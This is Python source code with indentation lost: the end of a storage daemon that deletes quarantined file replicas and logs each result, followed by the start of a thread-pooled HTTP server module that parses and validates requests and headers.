operation='delete', scheme=scheme).values()[0])
logging.info('Dark Reaper %s-%s: Deletion ATTEMPT of %s:%s as %s on %s', worker_number, total_workers, scope, replica['name'], pfn, rse)
start = time.time()
prot.delete(pfn)
duration = time.time() - start
logging.info('Dark Reaper %s-%s: Deletion SUCCESS of %s:%s as %s on %s in %s seconds', worker_number, total_workers, scope, replica['name'], pfn, rse, duration)
add_message('deletion-done', {'scope': scope,
'name': replica['name'],
'rse': rse,
'rse_id': rse_id,
'file-size': replica.get('bytes') or 0,
'bytes': replica.get('bytes') or 0,
'url': pfn,
'duration': duration,
'protocol': prot.attributes['scheme']})
deleted_replicas.append(replica)
except SourceNotFound:
err_msg = 'Dark Reaper %s-%s: Deletion NOTFOUND of %s:%s as %s on %s' % (worker_number, total_workers, scope, replica['name'], pfn, rse)
logging.warning(err_msg)
deleted_replicas.append(replica)
except (ServiceUnavailable, RSEAccessDenied, ResourceTemporaryUnavailable) as error:
err_msg = 'Dark Reaper %s-%s: Deletion NOACCESS of %s:%s as %s on %s: %s' % (worker_number, total_workers, scope, replica['name'], pfn, rse, str(error))
logging.warning(err_msg)
add_message('deletion-failed', {'scope': scope,
'name': replica['name'],
'rse': rse,
'rse_id': rse_id,
'file-size': replica['bytes'] or 0,
'bytes': replica['bytes'] or 0,
'url': pfn,
'reason': str(error),
'protocol': prot.attributes['scheme']})
except Exception:
logging.critical(traceback.format_exc())
finally:
prot.close()
delete_quarantined_replicas(rse_id=rse_id, replicas=deleted_replicas)
if once:
break
if once:
break
if nothing_to_do:
logging.info('Dark Reaper %s-%s: Nothing to do. I will sleep for 60s', worker_number, total_workers)
time.sleep(60)
except DatabaseException as error:
logging.warning('Reaper: %s', str(error))
except Exception:
logging.critical(traceback.format_exc())
die(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Graceful stop requested')
logging.info('Graceful stop done')
return
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
GRACEFUL_STOP.set()
def run(total_workers=1, chunk_size=100, once=False, rses=[], scheme=None,
exclude_rses=None, include_rses=None, delay_seconds=0, all_rses=False):
"""
Starts up the reaper threads.
:param total_workers: The total number of workers.
:param chunk_size: the size of chunk for deletion.
:param threads_per_worker: Total number of threads created by each worker.
:param once: If True, only runs one iteration of the main loop.
:param greedy: If True, delete right away replicas with tombstone.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
:param scheme: Force the reaper to use a particular protocol/scheme, e.g., mock.
:param exclude_rses: RSE expression to exclude RSEs from the Reaper.
:param include_rses: RSE expression to include RSEs.
"""
logging.info('main: starting processes')
if all_rses:
rses = list_rses()
elif not rses:
rses = [rse['id'] for rse in rse_core.list_rses()]
else:
rses = [rse_core.get_rse_id(rse=rse) for rse in rses]
threads = []
for worker in range(total_workers):
kwargs = {'worker_number': worker,
'total_workers': total_workers,
'rses': rses,
'once': once,
'chunk_size': chunk_size,
'scheme': scheme}
threads.append(threading.Thread(target=reaper, kwargs=kwargs, name='Worker: %s, Total_Workers: %s' % (worker, total_workers)))
[t.start() for t in threads]
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
server.py
|
"""
A high-speed, production ready, thread pooled, generic HTTP server.
For those of you wanting to understand internals of this module, here's the
basic call flow. The server's listening thread runs a very tight loop,
sticking incoming connections onto a Queue::
server = HTTPServer(...)
server.start()
-> while True:
tick()
# This blocks until a request comes in:
child = socket.accept()
conn = HTTPConnection(child, ...)
server.requests.put(conn)
Worker threads are kept in a pool and poll the Queue, popping off and then
handling each connection in turn. Each connection can consist of an arbitrary
number of requests and their responses, so we run a nested loop::
while True:
conn = server.requests.get()
conn.communicate()
-> while True:
req = HTTPRequest(...)
req.parse_request()
-> # Read the Request-Line, e.g. "GET /page HTTP/1.1"
req.rfile.readline()
read_headers(req.rfile, req.inheaders)
req.respond()
-> response = app(...)
try:
for chunk in response:
if chunk:
req.write(chunk)
finally:
if hasattr(response, "close"):
response.close()
if req.close_connection:
return
For running a server you can invoke :func:`start() <HTTPServer.start()>` (it
will run the server forever) or use invoking :func:`prepare()
<HTTPServer.prepare()>` and :func:`serve() <HTTPServer.serve()>` like this::
server = HTTPServer(...)
server.prepare()
try:
threading.Thread(target=server.serve).start()
# waiting/detecting some appropriate stop condition here
...
finally:
server.stop()
And now for a trivial doctest to exercise the test suite
>>> 'HTTPServer' in globals()
True
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import os
import io
import re
import email.utils
import socket
import sys
import time
import traceback as traceback_
import logging
import platform
import contextlib
import threading
try:
from functools import lru_cache
except ImportError:
from backports.functools_lru_cache import lru_cache
import six
from six.moves import queue
from six.moves import urllib
from . import connections, errors, __version__
from ._compat import bton, ntou
from ._compat import IS_PPC
from .workers import threadpool
from .makefile import MakeFile, StreamWriter
__all__ = (
'HTTPRequest', 'HTTPConnection', 'HTTPServer',
'HeaderReader', 'DropUnderscoreHeaderReader',
'SizeCheckWrapper', 'KnownLengthRFile', 'ChunkedRFile',
'Gateway', 'get_ssl_adapter_class',
)
IS_WINDOWS = platform.system() == 'Windows'
"""Flag indicating whether the app is running under Windows."""
IS_GAE = os.getenv('SERVER_SOFTWARE', '').startswith('Google App Engine/')
"""Flag indicating whether the app is running in GAE env.
Ref:
https://cloud.google.com/appengine/docs/standard/python/tools
/using-local-server#detecting_application_runtime_environment
"""
IS_UID_GID_RESOLVABLE = not IS_WINDOWS and not IS_GAE
"""Indicates whether UID/GID resolution's available under current platform."""
if IS_UID_GID_RESOLVABLE:
try:
import grp
import pwd
except ImportError:
"""Unavailable in the current env.
This shouldn't be happening normally.
All of the known cases are excluded via the if clause.
"""
IS_UID_GID_RESOLVABLE = False
grp, pwd = None, None
import struct
if IS_WINDOWS and hasattr(socket, 'AF_INET6'):
if not hasattr(socket, 'IPPROTO_IPV6'):
socket.IPPROTO_IPV6 = 41
if not hasattr(socket, 'IPV6_V6ONLY'):
socket.IPV6_V6ONLY = 27
if not hasattr(socket, 'SO_PEERCRED'):
"""
NOTE: the value for SO_PEERCRED can be architecture specific, in
which case the getsockopt() will hopefully fail. The arch
specific value could be derived from platform.processor()
"""
socket.SO_PEERCRED = 21 if IS_PPC else 17
LF = b'\n'
CRLF = b'\r\n'
TAB = b'\t'
SPACE = b' '
COLON = b':'
SEMICOLON = b';'
EMPTY = b''
ASTERISK = b'*'
FORWARD_SLASH = b'/'
QUOTED_SLASH = b'%2F'
QUOTED_SLASH_REGEX = re.compile(b''.join((b'(?i)', QUOTED_SLASH)))
comma_separated_headers = [
b'Accept', b'Accept-Charset', b'Accept-Encoding',
b'Accept-Language', b'Accept-Ranges', b'Allow', b'Cache-Control',
b'Connection', b'Content-Encoding', b'Content-Language', b'Expect',
b'If-Match', b'If-None-Match', b'Pragma', b'Proxy-Authenticate', b'TE',
b'Trailer', b'Transfer-Encoding', b'Upgrade', b'Vary', b'Via', b'Warning',
b'WWW-Authenticate',
]
if not hasattr(logging, 'statistics'):
logging.statistics = {}
class HeaderReader:
"""Object for reading headers from an HTTP request.
Interface and default implementation.
"""
def __call__(self, rfile, hdict=None):
"""
Read headers from the given stream into the given header dict.
If hdict is None, a new header dict is created. Returns the populated
header dict.
Headers which are repeated are folded together using a comma if their
specification so dictates.
This function raises ValueError when the read bytes violate the HTTP
spec.
You should probably return "400 Bad Request" if this happens.
"""
if hdict is None:
hdict = {}
while True:
line = rfile.readline()
if not line:
# No more data--illegal end of headers
raise ValueError('Illegal end of headers.')
if line == CRLF:
# Normal end of headers
break
if not line.endswith(CRLF):
raise ValueError('HTTP requires CRLF terminators')
if line[0] in (SPACE, TAB):
# It's a continuation line.
v = line.strip()
else:
try:
k, v = line.split(COLON, 1)
except ValueError:
raise ValueError('Illegal header line.')
v = v.strip()
k = self._transform_key(k)
hname = k
if not self._allow_header(k):
continue
if k in comma_separated_headers:
existing = hdict.get(hname)
if existing:
v = b', '.join((existing, v))
hdict[hname] = v
return hdict
def _allow_header(self, key_name):
return True
def _transform_key(self, key_name):
# TODO: what about TE and WWW-Authenticate?
return key_name.strip().title()
class DropUnderscoreHeaderReader(HeaderReader):
"""Custom HeaderReader to exclude any headers with underscores in them."""
def _allow_header(self, key_name):
orig = super(DropUnderscoreHeaderReader, self)._allow_header(key_name)
return orig and '_' not in key_name
class SizeCheckWrapper:
"""Wraps a file-like object, raising MaxSizeExceeded if too large.
:param rfile: ``file`` of a limited size
:param int maxlen: maximum length of the file being read
"""
def __init__(self, rfile, maxlen):
"""Initialize SizeCheckWrapper instance."""
self.rfile = rfile
self.maxlen = maxlen
self.bytes_read = 0
def _check_length(self):
if self.maxlen and self.bytes_read > self.maxlen:
raise errors.MaxSizeExceeded()
def read(self, size=None):
"""Read a chunk from ``rfile`` buffer and return it.
:param int size: amount of data to read
:returns: chunk from ``rfile``, limited by size if specified
:rtype: bytes
"""
data = self.rfile.read(size)
self.bytes_read += len(data)
self._check_length()
return data
def readline(self, size=None):
"""Read a single line from ``rfile`` buffer and return it.
:param int size: minimum amount of data to read
:returns: one line from ``rfile``
:rtype: bytes
"""
if size is not None:
data = self.rfile.readline(size)
self.bytes_read += len(data)
self._check_length()
return data
# User didn't specify a size ...
# We read the line in chunks to make sure it's not a 100MB line !
res = []
while True:
data = self.rfile.readline(256)
self.bytes_read += len(data)
self._check_length()
res.append(data)
# See https://github.com/cherrypy/cherrypy/issues/421
if len(data) < 256 or data[-1:] == LF:
return EMPTY.join(res)
def readlines(self, sizehint=0):
"""Read all lines from ``rfile`` buffer and return them.
:param int sizehint: hint of minimum amount of data to read
:returns: lines of bytes read from ``rfile``
:rtype: list[bytes]
"""
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline(sizehint)
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
return lines
def close(self):
"""Release resources allocated for ``rfile``."""
self.rfile.close()
def __iter__(self):
"""Return file iterator."""
return self
def __next__(self):
"""Generate next file chunk."""
data = next(self.rfile)
self.bytes_read += len(data)
self._check_length()
return data
next = __next__
class KnownLengthRFile:
"""Wraps a file-like object, returning an empty string when exhausted.
:param rfile: ``file`` of a known size
:param int content_length: length of the file being read
"""
def __init__(self, rfile, content_length):
"""Initialize KnownLengthRFile instance."""
self.rfile = rfile
self.remaining = content_length
def read(self, size=None):
"""Read a chunk from ``rfile`` buffer and return it.
:param int size: amount of data to read
:rtype: bytes
:returns: chunk from ``rfile``, limited by size if specified
"""
if self.remaining == 0:
return b''
if size is None:
size = self.remaining
else:
size = min(size, self.remaining)
data = self.rfile.read(size)
self.remaining -= len(data)
return data
def readline(self, size=None):
"""Read a single line from ``rfile`` buffer and return it.
:param int size: minimum amount of data to read
:returns: one line from ``rfile``
:rtype: bytes
"""
if self.remaining == 0:
return b''
if size is None:
size = self.remaining
else:
size = min(size, self.remaining)
data = self.rfile.readline(size)
self.remaining -= len(data)
return data
def readlines(self, sizehint=0):
"""Read all lines from ``rfile`` buffer and return them.
:param int sizehint: hint of minimum amount of data to read
:returns: lines of bytes read from ``rfile``
:rtype: list[bytes]
"""
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline(sizehint)
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
return lines
def close(self):
"""Release resources allocated for ``rfile``."""
self.rfile.close()
def __iter__(self):
"""Return file iterator."""
return self
def __next__(self):
"""Generate next file chunk."""
data = next(self.rfile)
self.remaining -= len(data)
return data
next = __next__
class ChunkedRFile:
"""Wraps a file-like object, returning an empty string when exhausted.
This class is intended to provide a conforming wsgi.input value for
request entities that have been encoded with the 'chunked' transfer
encoding.
:param rfile: file encoded with the 'chunked' transfer encoding
:param int maxlen: maximum length of the file being read
:param int bufsize: size of the buffer used to read the file
"""
def __init__(self, rfile, maxlen, bufsize=8192):
"""Initialize ChunkedRFile instance."""
self.rfile = rfile
self.maxlen = maxlen
self.bytes_read = 0
self.buffer = EMPTY
self.bufsize = bufsize
self.closed = False
def _fetch(self):
if self.closed:
return
line = self.rfile.readline()
self.bytes_read += len(line)
if self.maxlen and self.bytes_read > self.maxlen:
raise errors.MaxSizeExceeded(
'Request Entity Too Large', self.maxlen,
)
line = line.strip().split(SEMICOLON, 1)
try:
chunk_size = line.pop(0)
chunk_size = int(chunk_size, 16)
except ValueError:
raise ValueError(
'Bad chunked transfer size: {chunk_size!r}'.
format(chunk_size=chunk_size),
)
if chunk_size <= 0:
self.closed = True
return
# if line: chunk_extension = line[0]
if self.maxlen and self.bytes_read + chunk_size > self.maxlen:
raise IOError('Request Entity Too Large')
chunk = self.rfile.read(chunk_size)
self.bytes_read += len(chunk)
self.buffer += chunk
crlf = self.rfile.read(2)
if crlf != CRLF:
raise ValueError(
"Bad chunked transfer coding (expected '\\r\\n', "
'got ' + repr(crlf) + ')',
)
def read(self, size=None):
"""Read a chunk from ``rfile`` buffer and return it.
:param int size: amount of data to read
:returns: chunk from ``rfile``, limited by size if specified
:rtype: bytes
"""
data = EMPTY
if size == 0:
return data
while True:
if size and len(data) >= size:
return data
if not self.buffer:
self._fetch()
if not self.buffer:
# EOF
return data
if size:
remaining = size - len(data)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
else:
data += self.buffer
self.buffer = EMPTY
def readline(self, size=None):
"""Read a single line from ``rfile`` buffer and return it.
:param int size: minimum amount of data to read
:returns: one line from ``rfile``
:rtype: bytes
"""
data = EMPTY
if size == 0:
return data
while True:
if size and len(data) >= size:
return data
if not self.buffer:
self._fetch()
if not self.buffer:
# EOF
return data
newline_pos = self.buffer.find(LF)
if size:
if newline_pos == -1:
remaining = size - len(data)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
else:
remaining = min(size - len(data), newline_pos)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
else:
if newline_pos == -1:
data += self.buffer
self.buffer = EMPTY
else:
data += self.buffer[:newline_pos]
self.buffer = self.buffer[newline_pos:]
def readlines(self, sizehint=0):
"""Read all lines from ``rfile`` buffer and return them.
:param int sizehint: hint of minimum amount of data to read
:returns: lines of bytes read from ``rfile``
:rtype: list[bytes]
"""
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline(sizehint)
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
return lines
def read_trailer_lines(self):
"""Read HTTP headers and yield them.
Returns:
Generator: yields CRLF separated lines.
"""
if not self.closed:
raise ValueError(
'Cannot read trailers until the request body has been read.',
)
while True:
line = self.rfile.readline()
if not line:
# No more data--illegal end of headers
raise ValueError('Illegal end of headers.')
self.bytes_read += len(line)
if self.maxlen and self.bytes_read > self.maxlen:
raise IOError('Request Entity Too Large')
if line == CRLF:
# Normal end of headers
break
if not line.endswith(CRLF):
raise ValueError('HTTP requires CRLF terminators')
yield line
def close(self):
"""Release resources allocated for ``rfile``."""
self.rfile.close()
class HTTPRequest:
"""An HTTP Request (and response).
A single HTTP connection may consist of multiple request/response pairs.
"""
server = None
"""The HTTPServer object which is receiving this request."""
conn = None
"""The HTTPConnection object on which this request connected."""
inheaders = {}
"""A dict of request headers."""
outheaders = []
"""A list of header tuples to write in the response."""
ready = False
"""When True, the request has been parsed and is ready to begin generating
the response. When False, signals the calling Connection that the response
should not be generated and the connection should close."""
close_connection = False
"""Signals the calling Connection that the request should close. This does
not imply an error! The client and/or server may each request that the
connection be closed."""
chunked_write = False
"""If True, output will be encoded with the "chunked" transfer-coding.
This value is set automatically inside send_headers."""
header_reader = HeaderReader()
"""
A HeaderReader instance or compatible reader.
"""
def __init__(self, server, conn, proxy_mode=False, strict_mode=True):
"""Initialize HTTP request container instance.
Args:
server (HTTPServer): web server object receiving this request
conn (HTTPConnection): HTTP connection object for this request
proxy_mode (bool): whether this HTTPServer should behave as a PROXY
server for certain requests
strict_mode (bool): whether we should return a 400 Bad Request when
we encounter a request that a HTTP compliant client should not be
making
"""
self.server = server
self.conn = conn
self.ready = False
self.started_request = False
self.scheme = b'http'
if self.server.ssl_adapter is not None:
self.scheme = b'https'
# Use the lowest-common protocol in case read_request_line errors.
self.response_protocol = 'HTTP/1.0'
self.inheaders = {}
self.status = ''
self.outheaders = []
self.sent_headers = False
self.close_connection = self.__class__.close_connection
self.chunked_read = False
self.chunked_write = self.__class__.chunked_write
self.proxy_mode = proxy_mode
self.strict_mode = strict_mode
def parse_request(self):
"""Parse the next HTTP request start-line and message-headers."""
self.rfile = SizeCheckWrapper(
self.conn.rfile,
self.server.max_request_header_size,
)
try:
success = self.read_request_line()
except errors.MaxSizeExceeded:
self.simple_response(
'414 Request-URI Too Long',
'The Request-URI sent with the request exceeds the maximum '
'allowed bytes.',
)
return
else:
if not success:
return
try:
success = self.read_request_headers()
except errors.MaxSizeExceeded:
self.simple_response(
'413 Request Entity Too Large',
'The headers sent with the request exceed the maximum '
'allowed bytes.',
)
return
else:
if not success:
return
self.ready = True
def read_request_line(self):
"""Read and parse first line of the HTTP request.
Returns:
bool: True if the request line is valid or False if it's malformed.
"""
# HTTP/1.1 connections are persistent by default. If a client
# requests a page, then idles (leaves the connection open),
# then rfile.readline() will raise socket.error("timed out").
# Note that it does this based on the value given to settimeout(),
# and doesn't need the client to request or acknowledge the close
# (although your TCP stack might suffer for it: cf Apache's history
# with FIN_WAIT_2).
request_line = self.rfile.readline()
# Set started_request to True so communicate() knows to send 408
# from here on out.
self.started_request = True
if not request_line:
return False
if request_line == CRLF:
# RFC 2616 sec 4.1: "...if the server is reading the protocol
# stream at the beginning of a message and receives a CRLF
# first, it should ignore the CRLF."
# But only ignore one leading line! else we enable a DoS.
request_line = self.rfile.readline()
if not request_line:
return False
if not request_line.endswith(CRLF):
self.simple_response(
'400 Bad Request', 'HTTP requires CRLF terminators',
)
return False
try:
method, uri, req_protocol = request_line.strip().split(SPACE, 2)
if not req_protocol.startswith(b'HTTP/'):
self.simple_response(
'400 Bad Request', 'Malformed Request-Line: bad protocol',
)
return False
rp = req_protocol[5:].split(b'.', 1)
if len(rp) != 2:
self.simple_response(
'400 Bad Request', 'Malformed Request-Line: bad version',
)
return False
rp = tuple(map(int, rp)) # Minor.Major must be threat as integers
if rp > (1, 1):
self.simple_response(
'505 HTTP Version Not Supported', 'Cannot fulfill request',
)
return False
except (ValueError, IndexError):
self.simple_response('400 Bad Request', 'Malformed Request-Line')
return False
self.uri = uri
self.method = method.upper()
if self.strict_mode and method != self.method:
resp = (
'Malformed method name: According to RFC 2616 '
'(section 5.1.1) and its successors '
'RFC 7230 (section 3.1.1) and RFC 7231 (section 4.1) '
'method names are case-sensitive and uppercase.'
)
self.simple_response('400 Bad Request', resp)
return False
try:
if six.PY2: # FIXME: Figure out better way to do this
# Ref: https://stackoverflow.com/a/196392/595220 (like this?)
"""This is a dummy check for unicode in URI."""
ntou(bton(uri, 'ascii'), 'ascii')
scheme, authority, path, qs, fragment = urllib.parse.urlsplit(uri)
except UnicodeError:
self.simple_response('400 Bad Request', 'Malformed Request-URI')
return False
uri_is_absolute_form = (scheme or authority)
if self.method == b'OPTIONS':
# TODO: cover this branch with tests
path = (
uri
# https://tools.ietf.org/html/rfc7230#section-5.3.4
if (self.proxy_mode and uri_is_absolute_form)
else path
)
elif self.method == b'CONNECT':
# TODO: cover this branch with tests
if not self.proxy_mode:
self.simple_response('405 Method Not Allowed')
return False
# `urlsplit()` above parses "example.com:3128" as path part of URI.
# this is a workaround, which makes it detect netloc correctly
uri_split = urllib.parse.urlsplit(b''.join((b'//', uri)))
_scheme, _authority, _path, _qs, _fragment = uri_split
_port = EMPTY
try:
_port = uri_split.port
except ValueError:
pass
# FIXME: use third-party validation to make checks against RFC
# the validation doesn't take into account, that urllib parses
# invalid URIs without raising errors
# https://tools.ietf.org/html/rfc7230#section-5.3.3
invalid_path = (
_authority != uri
or not _port
or any((_scheme, _path, _qs, _fragment))
)
if invalid_path:
self.simple_response(
'400 Bad Request',
'Invalid path in Request-URI: request-'
'target must match authority-form.',
)
return False
authority = path = _authority
scheme = qs = fragment = EMPTY
else:
disallowed_absolute = (
self.strict_mode
and not self.proxy_mode
and uri_is_absolute_form
)
if disallowed_absolute:
# https://tools.ietf.org/html/rfc7230#section-5.3.2
# (absolute form)
"""Absolute URI is only allowed within proxies."""
self.simple_response(
'400 Bad Request',
'Absolute URI not allowed if server is not a proxy.',
)
return False
invalid_path = (
self.strict_mode
and not uri.startswith(FORWARD_SLASH)
and not uri_is_absolute_form
)
if invalid_path:
# https://tools.ietf.org/html/rfc7230#section-5.3.1
# (origin_form) and
"""Path should start with a forward slash."""
resp = (
'Invalid path in Request-URI: request-target must contain '
'origin-form which starts with absolute-path (URI '
'starting with a slash "/").'
)
self.simple_response('400 Bad Request', resp)
return False
if fragment:
self.simple_response(
'400 Bad Request',
'Illegal #fragment in Request-URI.',
)
return False
if path is None:
# FIXME: It looks like this case cannot happen
self.simple_response(
'400 Bad Request',
'Invalid path in Request-URI.',
)
return False
# Unquote the path+params (e.g. "/this%20path" -> "/this path").
# https://www.w3.org/Protocols/rfc2616/rfc2616-sec5.html#sec5.1.2
#
# But note that "...a URI must be separated into its components
# before the escaped characters within those components can be
# safely decoded." https://www.ietf.org/rfc/rfc2396.txt, sec 2.4.2
# Therefore, "/this%2Fpath" becomes "/this%2Fpath", not
# "/this/path".
try:
# TODO: Figure out whether exception can really happen here.
# It looks like it's caught on urlsplit() call above.
atoms = [
urllib.parse.unquote_to_bytes(x)
for x in QUOTED_SLASH_REGEX.split(path)
]
except ValueError as ex:
self.simple_response('400 Bad Request', ex.args[0])
return False
path = QUOTED_SLASH.join(atoms)
if not path.startswith(FORWARD_SLASH):
path = FORWARD_SLASH + path
if scheme is not EMPTY:
self.scheme = scheme
self.authority = authority
self.path = path
# Note that, like wsgiref and most other HTTP servers,
# we "% HEX HEX"-unquote the path but not the query string.
self.qs = qs
# Compare request and server HTTP protocol versions, in case our
# server does not support the requested protocol. Limit our output
# to min(req, server). We want the following output:
# request server actual written supported response
# protocol protocol response protocol feature set
# a 1.0 1.0 1.0 1.0
# b 1.0 1.1 1.1 1.0
# c 1.1 1.0 1.0 1.0
# d 1.1 1.1 1.1 1.1
# Notice that, in (b), the response will be "HTTP/1.1" even though
# the client only understands 1.0. RFC 2616 10.5.6 says we should
# only return 505 if the _major_ version is different.
sp = int(self.server.protocol[5]), int(self.server.protocol[7])
if sp[0] != rp[0]:
self.simple_response('505 HTTP Version Not Supported')
return False
self.request_protocol = req_protocol
self.response_protocol = 'HTTP/%s.%s' % min(rp, sp)
return True
def read_request_headers(self):
"""Read ``self.rfile`` into ``self.inheaders``.
Ref: :py:attr:`self.inheaders <HTTPRequest.outheaders>`.
:returns: success status
:rtype: bool
"""
# then all the http headers
try:
self.header_reader(self.rfile, self.inheaders)
except ValueError as ex:
self.simple_response('400 Bad Request', ex.args[0])
return False
mrbs = self.server.max_request_body_size
try:
cl = int(self.inheaders.get(b'Content-Length', 0))
except ValueError:
self.simple_response(
'400 Bad Request',
'Malformed Content-Length Header.',
)
return False
if mrbs and cl > mrbs:
self.simple_response(
'413 Request Entity Too Large',
'The entity sent with the request exceeds the maximum '
'allowed bytes.',
)
return False
# Persistent connection support
if self.response_protocol == 'HTTP/1.1':
# Both server and client are HTTP/1.1
if self.inheaders.get(b'Connection', b'') == b'close':
self.close_connection = True
else:
# Either the server or client (or both) are HTTP/1.0
if self.inheaders.get(b'Connection', b'') != b'Keep-Alive':
self.close_connection = True
# Transfer-Encoding support
te = None
if self.response_protocol == 'HTTP/1.1':
te = self.inheaders.get(b'Transfer-Encoding')
if te:
te = [x.strip().lower() for x in te.split(b',') if x.strip()]
self.chunked_read = False
if te:
for enc in te:
if enc == b'chunked':
self.chunked_read = True
else:
# Note that, even if we see "chunked", we must reject
# if there is an extension we don't recognize.
self.simple_response('501 Unimplemented')
self.close_connection = True
return False
# From PEP 333:
# "Servers and gateways that implement HTTP 1.1 must provide
# transparent support for HTTP 1.1's "expect/continue" mechanism.
# This may be done in any of several ways:
# 1. Respond to requests containing an Expect: 100-continue request
# with an immediate "100 Continue" response, and proceed normally.
# 2. Proceed with the request normally, but provide the application
# with a wsgi.input stream that will send the "100 Continue"
# response if/when the application first attempts to read from
# the input stream. The read request must then remain blocked
# until the client responds.
# 3. Wait until the client decides that the server does not support
# expect/continue, and sends the request body on its own.
# (This is suboptimal, and is not recommended.)
#
# We used to do 3, but are now doing 1. Maybe we'll do 2 someday,
# but it seems like it would be a big slowdown for such a rare case.
if self.inheaders.get(b'Expect', b'') == b'100-continue':
# Don't use simple_response here, because it emits headers
# we don't want. See
# https://github.com/cherrypy/cherrypy/issues/951
msg = b''.join((
self.server.protocol.encode('ascii'), SPACE, b'100 Continue',
CRLF, CRLF,
))
try:
self.conn.wfile.write(msg)
except socket.error as ex:
if ex.args[0] not in errors.socket_errors_to_ignore:
raise
return True
def respond(self):
"""Call the gateway and write its iterable output."""
mrbs = self.server.max_request_body_size
if self.chunked_read:
self.rfile = ChunkedRFile(self.conn.rfile, mrbs)
else:
cl = int(self.inheaders.get(b'Content-Length', 0))
if mrbs and mrbs < cl:
if not self.sent_headers:
self.simple_response(
'413 Request Entity Too Large',
'The entity sent with the request exceeds the '
'maximum allowed bytes.',
)
return
self.rfile = KnownLengthRFile(self.conn.rfile, cl)
self.server.gateway(self).respond()
self.ready and self.ensure_headers_sent()
if self.chunked_write:
self.conn.wfile.write(b'0\r\n\r\n')
def simple_response(self, status, msg=''):
"""Write a simple response back to the client."""
status = str(status)
proto_status = '%s %s\r\n' % (self.server.protocol, status)
content_length = 'Content-Length: %s\r\n' % len(msg)
content_type = 'Content-Type: text/plain\r\n'
buf = [
proto_status.encode('ISO-8859-1'),
content_length.encode('ISO-8859-1'),
content_type.encode('ISO-8859-1'),
]
if status[:3] in ('413', '414'):
# Request Entity Too Large / Request-URI Too Long
self.close_connection = True
if self.response_protocol == 'HTTP/1.1':
# This will not be true for 414, since read_request_line
# usually raises 414 before reading the whole line, and we
# therefore cannot know the proper response_protocol.
buf.append(b'Connection: close\r\n')
else:
# HTTP/1.0 had no 413/414 status nor Connection header.
# Emit 400 instead and trust the message body is enough.
status = '400 Bad Request'
buf.append(CRLF)
if msg:
if isinstance(msg, six.text_type):
msg = msg.encode('ISO-8859-1')
buf.append(msg)
try:
self.conn.wfile.write(EMPTY.join(buf))
except socket.error as ex:
if ex.args[0] not in errors.socket_errors_to_ignore:
raise
def ensure_headers_sent(self):
"""Ensure headers are sent to the client if not already sent."""
if not self.sent_headers:
self.sent_headers = True
self.send_headers()
def write(self, chunk):
"""Write unbuffered data to the client."""
if self.chunked_write and chunk:
chunk_size_hex = hex(len(chunk))[2:].encode('ascii')
buf = [chunk_size_hex, CRLF, chunk, CRLF]
self.conn.wfile.write(EMPTY.join(buf))
else:
self.conn.wfile.write(chunk)
def send_headers(self):
"""Assert, process, and send the HTTP response message-headers.
You must set ``self.status``, and :py:attr:`self.outheaders
<HTTPRequest.outheaders>` before calling this.
"""
hkeys = [key.lower() for key, value in self.outheaders]
status = int(self.status[:3])
if status == 413:
# Request Entity Too Large. Close conn to avoid garbage.
self.close_connection = True
elif b'content-length' not in hkeys:
# "All 1xx (informational), 204 (no content),
# and 304 (not modified) responses MUST NOT
# include a message-body." So no point chunking.
if status < 200 or status in (204, 205, 304):
pass
else:
needs_chunked = (
self.response_protocol == 'HTTP/1.1'
and self.method != b'HEAD'
)
if needs_chunked:
# Use the chunked transfer-coding
self.chunked_write = True
self.outheaders.append((b'Transfer-Encoding', b'chunked'))
else:
# Closing the conn is the only way to determine len.
self.close_connection = True
# Override the decision to not close the connection if the connection
# manager doesn't have space for it.
if not self.close_connection:
can_keep = self.server.connections.can_add_keepalive_connection
self.close_connection = not can_keep
if b'connection' not in hkeys:
if self.response_protocol == 'HTTP/1.1':
# Both server and client are HTTP/1.1 or better
if self.close_connection:
self.outheaders.append((b'Connection', b'close'))
else:
# Server and/or client are HTTP/1.0
if not self.close_connection:
self.outheaders.append((b'Connection', b'Keep-Alive'))
if (not self.close_connection) and (not self.chunked_read):
# Read any remaining request body data on the socket.
# "If an origin server receives a request that does not include an
# Expect request-header field with the "100-continue" expectation,
# the request includes a request body, and the server responds
# with a final status code before reading the entire request body
# from the transport connection, then the server SHOULD NOT close
# the transport connection until it has read the entire request,
# or until the client closes the connection. Otherwise, the client
# might not reliably receive the response message. However, this
# requirement is not be construed as preventing a server from
# defending itself against denial-of-service attacks, or from
# badly broken client implementations."
remaining = getattr(self.rfile, 'remaining', 0)
if remaining > 0:
self.rfile.read(remaining)
if b'date' not in hkeys:
self.outheaders.append((
b'Date',
email.utils.formatdate(usegmt=True).encode('ISO-8859-1'),
))
if b'server' not in hkeys:
self.outheaders.append((
b'Server',
self.server.server_name.encode('ISO-8859-1'),
))
proto = self.server.protocol.encode('ascii')
buf = [proto + SPACE + self.status + CRLF]
for k, v in self.outheaders:
buf.append(k + COLON + SPACE + v + CRLF)
buf.append(CRLF)
self.conn.wfile.write(EMPTY.join(buf))
class HTTPConnection:
"""An HTTP connection (active socket)."""
remote_addr = None
remote_port = None
ssl_env = None
rbufsize = io.DEFAULT_BUFFER_SIZE
wbufsize = io.DEFAULT_BUFFER_SIZE
RequestHandlerClass = HTTPRequest
peercreds_enabled = False
peercreds_resolve_enabled = False
# Fields set by ConnectionManager.
closeable = False
last_used = None
ready_with_data = False
def __init__(self, server, sock, makefile=MakeFile):
"""Initialize HTTPConnection instance.
Args:
server (HTTPServer): web server object receiving this request
sock (socket._socketobject): the raw socket object (usually
TCP) for this connection
makefile (file): a fileobject class for reading from the socket
"""
self.server = server
self.socket = sock
self.rfile = makefile(sock, 'rb', self.rbufsize)
self.wfile = makefile(sock, 'wb', self.wbufsize)
self.requests_seen = 0
